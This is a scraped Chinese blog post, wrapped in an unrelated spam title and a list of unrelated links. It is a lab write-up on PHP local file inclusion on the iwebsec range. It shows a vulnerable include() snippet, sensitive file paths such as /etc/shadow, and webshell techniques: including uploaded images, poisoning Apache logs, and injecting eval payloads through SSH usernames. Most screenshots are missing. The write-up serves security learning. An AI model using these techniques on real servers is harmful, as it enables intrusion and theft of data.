当前位置: 首页 > news >正文

帝国网站模板建设视频怎么让网站排名上去

帝国网站模板建设视频,怎么让网站排名上去,网页搜索记录怎么恢复,网页美工实例教程文章目录00-文件包含漏洞原理环境01-本地文件包含读取敏感文件信息配合文件上传getshell配合日志文件getshell配合SSH日志配合运行环境00-文件包含漏洞原理 为什么要文件包含? 为什么会有文件包含漏洞? 因为将被包含的文件设置为变量,用来进行动态调用…

文章目录

      • 00-文件包含漏洞原理
        • 环境
      • 01-本地文件包含
        • 读取敏感文件信息
        • 配合文件上传getshell
        • 配合日志文件getshell
        • 配合SSH日志
        • 配合运行环境

00-文件包含漏洞原理

为什么要文件包含?

在这里插入图片描述

为什么会有文件包含漏洞?

因为将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性, 从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。文件包含函数的参数没有经过过滤,可以被攻击者控制,包含其他恶意文件,导致了执行恶意的代码。

什么是文件包含漏洞?

PHP的文件包含可以直接执行包含文件的代码,包含的文件格式不受限制(无论是txt、图片文件还是远程URL,全都作为PHP代码执行),只要能正常执行即可。文件包含函数有include()include_once()require()require_once(),它们之间的区别在于include()include_once()在文件包含时即使遇到错误,下面的代码仍继续会执行;而require()require_once()则会直接报错退出程序。【摘自《代码审计——企业级Web代码安全架构》】

环境

靶场:iwebsec,前面的文章有搭建过程。

在这里插入图片描述

01-本地文件包含

本地文件包含(local file include,LFI)是指只能包含在本机文件的文件包含漏洞,大多出现在模块加载、模板加载和cache调用的地方。

本关卡源码如下:

<?phpif(isset($_GET['filename'])){$filename  = $_GET['filename'];include($filename);//对$filename包含,没有进行限制}else{exit();}
?>

读取敏感文件信息

/etc/passwd(系统用户数据库文件)
/etc/group(组的数据库文件)
/etc/gshadow(存放密码)
/etc/shadow(存放密码)
/etc/profile(系统环境)
/etc/crontab(crontab配置文件)
/etc/httpd/conf/httpd.conf(Apache配置信息)
/etc/my.conf(MYSQL配置信息)
/usr/etc/php.ini(PHP配置信息)  

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

配合文件上传getshell

假设shell.png这个文件是我们通过文件上传点上传的,但是无法解析,我们可以利用这里的文件包含漏洞解析shell.png,执行php代码。

在这里插入图片描述

访问shell.png,执行成功

在这里插入图片描述

蚁剑连接

在这里插入图片描述

类似地,可以上传其他后缀的文件,同样也可以解析

在这里插入图片描述

在这里插入图片描述

配合日志文件getshell

参考文章

在这里插入图片描述

浏览器发起请求

在这里插入图片描述

查看日志文件

apache+Linux日志默认路径:/etc/httpd/logs/access_log 或者 /var/log/httpd/access_log

在这里插入图片描述

一句话木马被编码了,用burpsuite发包。

在这里插入图片描述

网页源代码查看日志【方便看一点】

在这里插入图片描述

蚁剑连接

在这里插入图片描述

配合SSH日志

在这里插入图片描述

在这里插入图片描述

这个靶场环境不可以,我在本机自己测试。在web服务器的根目录新建1.php文件,写入如下代码,即01环境的代码。

在这里插入图片描述

日志文件在/var/log/secure,检查文件权限

在这里插入图片描述

修改权限

在这里插入图片描述

成功包含

在这里插入图片描述

写入一句话木马或者phpinfo()

ssh '<?php @eval($_POST[1]);?>'@8.134.148.36
ssh '<?php phpinfo();?>'@8.134.148.36

在这里插入图片描述

在这里插入图片描述

蚁剑连接

在这里插入图片描述

在这里插入图片描述

复现完成,把权限修改回去

在这里插入图片描述

在这里插入图片描述

配合运行环境

在这里插入图片描述

访问,没有权限

在这里插入图片描述

只有文件所有者具有读权限

在这里插入图片描述

下次遇到类似环境再试试。

在这里插入图片描述

剩下的留在下个文章写。

在这里插入图片描述

http://www.yayakq.cn/news/316868/

相关文章:

  • 建设部监理师网站深圳做网站比较好的公司有哪些
  • 博客网站素材低价网站建设联系方式
  • 手机网站建设与布局推推蛙seo
  • 企业网站怎么自适应沧州seo包年优化软件排名
  • 常用网站开发技术和工具运营托管公司
  • easyui做门户网站行业做门户网站挣钱吗
  • 网站自适应与响应式做游戏网站有几个要素
  • 网站建设分金手指排名二六美食网站建设项目预算
  • 辽宁省建设工程招标协会网站广州应用网站设计
  • 网站建设合同约定三年后全国最好的网站建设案例
  • 石家庄建站模板厂家深圳百度地图
  • 网站规划的公司wordpress m3u8 插件
  • 做公众好号的网站湖南佳邦建设有限公司网站
  • 做视频网站收费标准怎么能自己做网站
  • 设计网站公司力荐亿企邦哪有做机械设计的网站
  • 怎么注册网站 个人2024年新手机上市时间表
  • 金融网站开发方案织梦微电影分享网站织梦整站源码
  • 做外贸网站功能关键词挖掘爱站网
  • 建站 赚钱黄海军事最新消息
  • 可以做外国网站文章搜维斯网站建设
  • 专业网站是什么意思上海的广告公司网站建设
  • 门户网站怎么建设需要多长时间网站内容建设ppt
  • 河北网站设计推荐柚米科技可以做羞羞的游戏视频网站
  • 空间设计网站大全太原富库网站建设
  • 企业官方网站开发平台wordpress 应用模板下载
  • 传媒公司php网站源码app应用商店
  • 怎样在网站上做免费的网业装饰公司网站建设效果
  • 美食网站开发开题报告丽水做网站的公司
  • 网站源码怎么预览外贸网站建设seo
  • 知名seo网站优化公司wordpress文章摘要字数